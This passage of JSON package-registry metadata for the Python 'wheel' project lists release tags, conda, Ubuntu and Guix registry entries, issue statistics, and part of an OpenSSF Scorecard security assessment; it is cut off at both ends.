/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.019Z","dependent_packages_count":8,"downloads":null,"downloads_period":null,"dependent_repos_count":5672,"rankings":{"downloads":null,"dependent_repos_count":0.21141649048625794,"dependent_packages_count":5.980066445182724,"stargazers_count":33.34340078526125,"forks_count":28.903654485049834,"docker_downloads_count":null,"average":17.109634551495017},"purl":"pkg:conda/wheel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":false,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages/wheel/codemeta","maintainers":[],"registry":{"name":"anaconda.org","url":"https://anaconda.org","ecosystem":"conda","default":true,"packages_count":5213,"maintainers_count":0,"namespaces_count":0,"keywords_count":3232,"github":"Anaconda","metadata":{"kind":"anaconda","key":"Main","api":"https://repo.ananconda.com","funded_packages_count":759},"icon_url":"https://github.com/Anaconda.png","created_at":"2022-10-03T15:37:08.736Z","updated_at":"2026-06-10T05:18:41.108Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/anaconda.org/namespaces"}},{"id":13755409,"name":"wheel","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/pypa/wheel","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/pypa/wheel","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T08:24:08.917Z","latest_release_published_at":"2026-02-13T08:24:08.917Z","latest_release_number":"0.34.2-1","last_synced_at":"2026-03-13T17:23:53.576Z","created_at":"2026-02-13T08:24:08.737Z","updated_at":"2026-03-13T17:23:53.576Z","registry_url":"https://launchpad.net/ubuntu/+source/wheel","install_command":"apt-get install wheel","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common","standards_version":"4.5.0","maintainer":"Debian Python Modules Team \u003cpython-modules-team@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-python, python3-sphinx, python3-all, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{},"repo_metadata_updated_at":"2026-02-13T08:25:59.257Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/wheel?arch=source\u0026distro=ubuntu-20.04\u0026repository_url=https://launchpad.net/ubuntu/focal","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/wheel/codemeta","maintainers":[],"registry":{"name":"ubuntu-20.04","url":"https://launchpad.net/ubuntu/focal","ecosystem":"ubuntu","default":false,"packages_count":30789,"maintainers_count":0,"namespaces_count":4,"keywords_count":1430,"github":"ubuntu","metadata":{"codename":"focal","funded_packages_count":165},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:47.233Z","updated_at":"2026-06-10T05:17:46.717Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/namespaces"}},{"id":13953186,"name":"python-wheel","ecosystem":"guix","description":"Format for built Python packages","homepage":"https://github.com/pypa/wheel","licenses":"expat","normalized_licenses":["Other"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2026-03-02T19:48:50.248Z","latest_release_published_at":"2026-03-02T19:48:50.248Z","latest_release_number":"0.46.1","last_synced_at":"2026-04-27T16:44:23.779Z","created_at":"2026-03-02T19:48:50.068Z","updated_at":"2026-04-27T16:44:23.779Z","registry_url":"https://packages.guix.gnu.org/packages/python-wheel/0.40.0/","install_command":"guix install python-wheel","documentation_url":"https://git.savannah.gnu.org/cgit/guix.git/tree/gnu/packages/python-build.scm#n873","metadata":{"location":"gnu/packages/python-build.scm:873","variable_name":"python-wheel"},"repo_metadata":{},"repo_metadata_updated_at":"2026-03-02T19:48:50.870Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/python-wheel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/python-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/python-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/python-wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-wheel/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":31798,"maintainers_count":0,"namespaces_count":0,"keywords_count":1627,"github":"guix-mirror","metadata":{"funded_packages_count":368},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-06-10T05:17:25.224Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":13812145,"name":"wheel","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/pypa/wheel","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T20:13:07.272Z","latest_release_published_at":"2026-02-13T20:13:07.272Z","latest_release_number":"0.41.0-2","last_synced_at":"2026-03-14T07:13:15.553Z","created_at":"2026-02-13T20:13:07.063Z","updated_at":"2026-03-14T07:13:15.817Z","registry_url":"https://launchpad.net/ubuntu/+source/wheel","install_command":"apt-get install wheel","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python (\u003e= 6), flit, pybuild-plugin-pyproject, python3-all-dev, python3-pytest \u003c!nocheck\u003e, python3-pytest-cov \u003c!nocheck\u003e, python3-sphinx \u003c!nodoc\u003e, tox (\u003e= 4) \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2026-01-22T12:39:15.000Z","size":1854,"stargazers_count":548,"open_issues_count":13,"forks_count":174,"subscribers_count":30,"default_branch":"main","last_synced_at":"2026-02-07T09:12:07.710Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2026-01-31T21:22:34.000Z","dependencies_parsed_at":"2026-01-29T00:01:21.253Z","dependency_job_id":null,"html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":70,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and 